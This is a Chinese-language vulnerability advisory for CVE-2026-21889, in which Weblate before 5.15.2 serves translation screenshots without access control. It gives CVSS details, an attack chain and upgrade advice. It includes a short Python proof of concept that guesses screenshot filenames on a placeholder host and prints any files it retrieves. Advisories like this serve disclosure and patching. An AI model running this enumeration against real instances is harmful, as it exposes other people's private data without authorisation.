CVE-2026-21889 CVSS 7.5 高危

CVE-2026-21889: Weblate截图文件路径遍历/未授权访问漏洞

披露日期: 2026-01-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-21889

漏洞类型

未授权访问/敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Weblate

漏洞概述

Weblate是一款基于Web的本地化工具。在5.15.2版本之前，存在一个安全漏洞，截图图片由HTTP服务器直接提供，缺少适当的访问控制机制。攻击者可以通过猜测文件名的方式，在未经身份验证的情况下访问这些截图文件，可能导致敏感信息泄露。该漏洞影响Weblate的多个部署环境，CVSS评分为7.5，属于高危漏洞。

技术细节

漏洞源于Weblate在处理截图文件时，未实施有效的访问控制。HTTP服务器直接提供截图资源，而没有验证请求者是否具有相应权限。攻击者可以利用文件枚举或猜测文件名的方式来访问这些文件。

攻击链分析

STEP 1

攻击者识别目标Weblate实例

STEP 2

通过枚举或猜测文件名尝试访问截图文件

STEP 3

成功获取截图文件内容，导致敏感信息泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# 目标URL
base_url = "http://target-weblate-instance.com"

# 尝试访问截图文件
test_filenames = [
    "screenshot_001.png",
    "screenshot_002.png",
    "screenshot_003.png"
]

for filename in test_filenames:
    url = f"{base_url}/media/screenshots/{filename}"
    response = requests.get(url)
    
    if response.status_code == 200:
        print(f"成功访问截图文件: {filename}")
        print(f"文件内容: {response.content}")
    else:
        print(f"无法访问: {filename}")

影响范围

Weblate < 5.15.2

防御指南

临时缓解措施

立即升级Weblate至5.15.2或更高版本，以修复此安全漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表